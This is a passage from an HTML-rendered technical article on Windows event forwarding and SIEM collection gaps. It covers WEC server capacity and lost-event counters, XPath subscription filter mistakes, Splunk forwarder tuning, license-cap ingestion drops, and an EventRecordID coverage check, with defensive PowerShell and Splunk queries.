\"latency\\|heartbeat\\|delivery\"</span><br></span></code></pre></div></div>\n<p>In Normal mode, a 15-minute incident can generate zero SIEM alerts because events haven't been forwarded yet. This is not a theoretical concern  it is a documented behavior that directly impacts mean time to detect.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-wec-server-capacity-limits-and-drop-behavior\">4.3 WEC Server Capacity Limits and Drop Behavior<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#43-wec-server-capacity-limits-and-drop-behavior\" class=\"hash-link\" aria-label=\"Direct link to 4.3 WEC Server Capacity Limits and Drop Behavior\" title=\"Direct link to 4.3 WEC Server Capacity Limits and Drop Behavior\" translate=\"no\">​</a></h3>\n<p>A WEC server on commodity hardware handles approximately 3,000 events per second on average across all subscriptions. This sounds like a lot. It is not, for a large enterprise.</p>\n<p>Calculation: 1,000 workstations × 150 events/sec each at peak (logon storms, patch Tuesday, incident response) = 150,000 events/sec. A single WEC server will be saturated at ~2% of that load.</p>\n<p>When the WEC server exceeds capacity:</p>\n<!-- -->\n<p>Monitor WEC health with these performance counters:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on the WEC server</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$counters = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Lost',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Logged per second',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Web Service(_Total)\\Current Connections',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Web Service(_Total)\\Maximum Connections',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Processor(_Total)\\% Processor Time',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Memory\\Available MBytes'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Continuous monitoring with 10-second samples</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter -Counter $counters -SampleInterval 10 -MaxSamples 60 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object -ExpandProperty CounterSamples |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Path, CookedValue, Timestamp |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Watch specifically for Events Lost counter  any non-zero value is critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter '\\Event Tracing for Windows Session(EventLog-ForwardedEvents)\\Events Lost' `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -SampleInterval 5 -MaxSamples 12 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object -ExpandProperty CounterSamples |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.CookedValue -gt 0 } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object { Write-Warning \"EVENTS LOST at $($_.Timestamp): $($_.CookedValue)\" }</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"44-xpath-subscription-filters-the-gaps-you-introduced-intentionally\">4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#44-xpath-subscription-filters-the-gaps-you-introduced-intentionally\" class=\"hash-link\" aria-label=\"Direct link to 4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally\" title=\"Direct link to 4.4 XPath Subscription Filters: The Gaps You Introduced Intentionally\" translate=\"no\">​</a></h3>\n<p>WEF subscriptions use XPath queries to filter which events are forwarded. These queries are powerful but error-prone. A syntax mistake or logic error in an XPath filter silently excludes events with no error message.</p>\n<p>Example of a broken XPath filter that silently misses events:</p>\n<div class=\"language-xml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-xml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">&lt;!-- BROKEN: This filter tries to catch Event ID 4688 AND 4624</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">     but the XPath is semantically wrong  will not match anything --&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Id</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">0</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    *[System[(EventID=4688)]] AND *[System[(EventID=4624)]]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">&lt;!-- CORRECT: Use separate Select elements or proper XPath OR syntax --&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Id</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">0</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\"> </span><span class=\"token tag attr-name\" style=\"color:hsl(212, 92%, 35%)\">Path</span><span class=\"token tag attr-value punctuation attr-equals\" style=\"color:hsl(212, 13%, 16%)\">=</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag attr-value\" style=\"color:hsl(356, 75%, 47%)\">Security</span><span class=\"token tag attr-value punctuation\" style=\"color:hsl(212, 13%, 16%)\">\"</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    *[System[(EventID=4688 or EventID=4624)]]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Select</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&lt;/</span><span class=\"token tag\" style=\"color:hsl(212, 92%, 35%)\">Query</span><span class=\"token tag punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><br></span></code></pre></div></div>\n<p>Validate your XPath filters before deployment:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Test an XPath filter against local logs before putting it in a subscription</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This reveals whether the filter syntax is correct and returns events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$xpath = \"*[System[(EventID=4688 or EventID=4624 or EventID=4625)]]\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$logName = \"Security\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $events = Get-WinEvent -LogName $logName -FilterXPath $xpath -MaxEvents 10 -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"XPath filter valid. Matched $($events.Count) recent events.\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $events | Select-Object TimeCreated, Id, Message | Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} catch [System.Exception] {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Error \"XPath filter INVALID or no matching events: $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Also validate that key event IDs ARE present in the log at all</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># (if they're not, the audit policy isn't generating them)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$criticalEventIDs = @(4688, 4624, 4625, 4672, 4698, 4719, 4776)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($id in $criticalEventIDs) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $count = (Get-WinEvent -LogName Security -FilterXPath \"*[System[EventID=$id]]\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              -MaxEvents 1000 -ErrorAction SilentlyContinue).Count</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $status = if ($count -gt 0) { \"✓ Present ($count in last 1000)\" } else { \"⚠ ABSENT  check audit policy\" }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"Event ID $id : $status\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--the-siem-agent-layer-hidden-drop-points\">Part 5  The SIEM Agent Layer: Hidden Drop Points<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-5--the-siem-agent-layer-hidden-drop-points\" class=\"hash-link\" aria-label=\"Direct link to Part 5  The SIEM Agent Layer: Hidden Drop Points\" title=\"Direct link to Part 5  The SIEM Agent Layer: Hidden Drop Points\" translate=\"no\">​</a></h2>\n<p>SIEM agents (Splunk Universal Forwarder, Elastic Agent, Microsoft Monitoring Agent, etc.) introduce their own failure modes. These are frequently overlooked because the agent is \"running\" and heartbeating to the SIEM, even while dropping events.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"51-the-bookmark-race-condition\">5.1 The Bookmark Race Condition<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#51-the-bookmark-race-condition\" class=\"hash-link\" aria-label=\"Direct link to 5.1 The Bookmark Race Condition\" title=\"Direct link to 5.1 The Bookmark Race Condition\" translate=\"no\">​</a></h3>\n<p>SIEM agents reading <code>.evtx</code> files maintain a local bookmark (position marker) in the file they are reading. The agent reads from the bookmark forward, ships events, and updates the bookmark. The race condition:</p>\n<!-- -->\n<p>The fix is twofold: make the log large enough that it doesn't wrap during the agent's read cycle, and ensure the agent's batch processing interval is short enough relative to the event generation rate. For Splunk UF:</p>\n<div class=\"language-ini codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-ini codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># inputs.conf  Splunk Universal Forwarder tuning for high-volume Security logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">[WinEventLog://Security]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">disabled = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">start_from = oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">current_only = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">checkpointInterval = 5        # Flush bookmark every 5 seconds (default: 60)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">batch_size = 10               # Read 10 events per batch (tune down on busy DCs)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">renderXml = true              # Capture full XML for field extraction</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">blacklist1 = EventCode=\"4634\" # Exclude logoff events if volume too high</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">blacklist2 = EventCode=\"4656\" # Exclude handle requests (very noisy)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">[WinEventLog://Microsoft-Windows-Sysmon/Operational]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">disabled = 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">start_from = oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">checkpointInterval = 5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">batch_size = 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">renderXml = true</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-license-cap-induced-dropping-the-invisible-budget-problem\">5.2 License-Cap Induced Dropping (The Invisible Budget Problem)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#52-license-cap-induced-dropping-the-invisible-budget-problem\" class=\"hash-link\" aria-label=\"Direct link to 5.2 License-Cap Induced Dropping (The Invisible Budget Problem)\" title=\"Direct link to 5.2 License-Cap Induced Dropping (The Invisible Budget Problem)\" translate=\"no\">​</a></h3>\n<p>Many SIEM platforms enforce daily ingestion limits based on license volume. When the daily cap is hit:</p>\n<ul>\n<li class=\"\"><strong>Splunk:</strong> Indexing stops. No new events accepted until the next license window. A warning appears in the Splunk UI  but only if someone is watching.</li>\n<li class=\"\"><strong>Microsoft Sentinel:</strong> Ingestion continues but per-GB pricing means cost spikes, sometimes triggering organizational decisions to cap ingestion  implemented via Data Collection Rules that silently filter events.</li>\n<li class=\"\"><strong>Elastic:</strong> License limits restrict feature use, but ingest is less commonly hard-capped.</li>\n</ul>\n<p>Check your Splunk license usage:</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| rest /services/licenser/pools</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table title, used_bytes, effective_quota, slave_count</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval used_GB = round(used_bytes/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval quota_GB = round(effective_quota/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval pct_used = round((used_bytes/effective_quota)*100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where pct_used &gt; 80</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -pct_used</span><br></span></code></pre></div></div>\n<p>Check for indexing gaps in Splunk (license exceeded periods):</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=_internal source=*license_usage.log type=Usage</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| timechart span=1h sum(b) as bytes_indexed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval GB_indexed = round(bytes_indexed/1073741824, 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where GB_indexed = 0</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--how-to-actually-measure-your-collection-fidelity\">Part 6  How to Actually Measure Your Collection Fidelity<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-6--how-to-actually-measure-your-collection-fidelity\" class=\"hash-link\" aria-label=\"Direct link to Part 6  How to Actually Measure Your Collection Fidelity\" title=\"Direct link to Part 6  How to Actually Measure Your Collection Fidelity\" translate=\"no\">​</a></h2>\n<p>Everything above describes where things go wrong. This section tells you how to measure whether they are going wrong in your environment, right now.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-eventrecordid-continuity-test\">6.1 The EventRecordID Continuity Test<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#61-the-eventrecordid-continuity-test\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The EventRecordID Continuity Test\" title=\"Direct link to 6.1 The EventRecordID Continuity Test\" translate=\"no\">​</a></h3>\n<p>The most direct measurement: compare the EventRecordID sequence seen in your SIEM against what the source machine has generated. Any gap = events you do not have.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On the source machine: get the current highest EventRecordID and earliest retained</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$securityLog = Get-WinEvent -LogName Security -MaxEvents 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$oldestEvent = Get-WinEvent -LogName Security -MaxEvents 1 -Oldest</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$sourceStats = [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LatestRecordId  = $securityLog.RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    OldestRecordId  = $oldestEvent.RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    OldestTimestamp = $oldestEvent.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TotalRetained   = $securityLog.RecordId - $oldestEvent.RecordId + 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Source latest RecordId: $($sourceStats.LatestRecordId)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Source oldest retained: $($sourceStats.OldestRecordId) at $($sourceStats.OldestTimestamp)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Events retained locally: $($sourceStats.TotalRetained)\"</span><br></span></code></pre></div></div>\n<p>Now check what your SIEM has for the same host:</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog host=\"DC01\" source=\"WinEventLog:Security\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| stats min(EventRecordID) as earliest_in_siem, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        max(EventRecordID) as latest_in_siem,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        count as total_in_siem</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        by host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval coverage_pct = round((total_in_siem / (latest_in_siem - earliest_in_siem + 1)) * 100, 2)</span><br></span></code></pre></div></div>\n<p>If <code>coverage_pct</code> is substantially below 100%, events in that ID range are missing from your SIEM. The delta between source <code>TotalRetained</code> and SIEM <code>total_in_siem</code> over the same period is your gap count.</p>\n<h3 class=\"anchor 